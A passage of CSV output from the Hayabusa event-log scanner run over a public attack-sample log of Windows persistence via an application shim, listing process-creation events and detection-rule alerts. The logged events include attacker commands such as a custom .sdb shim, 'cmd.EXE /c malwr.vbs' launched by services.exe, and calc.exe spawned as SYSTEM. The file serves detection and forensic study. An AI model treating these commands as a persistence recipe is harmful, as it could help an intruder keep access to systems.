""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 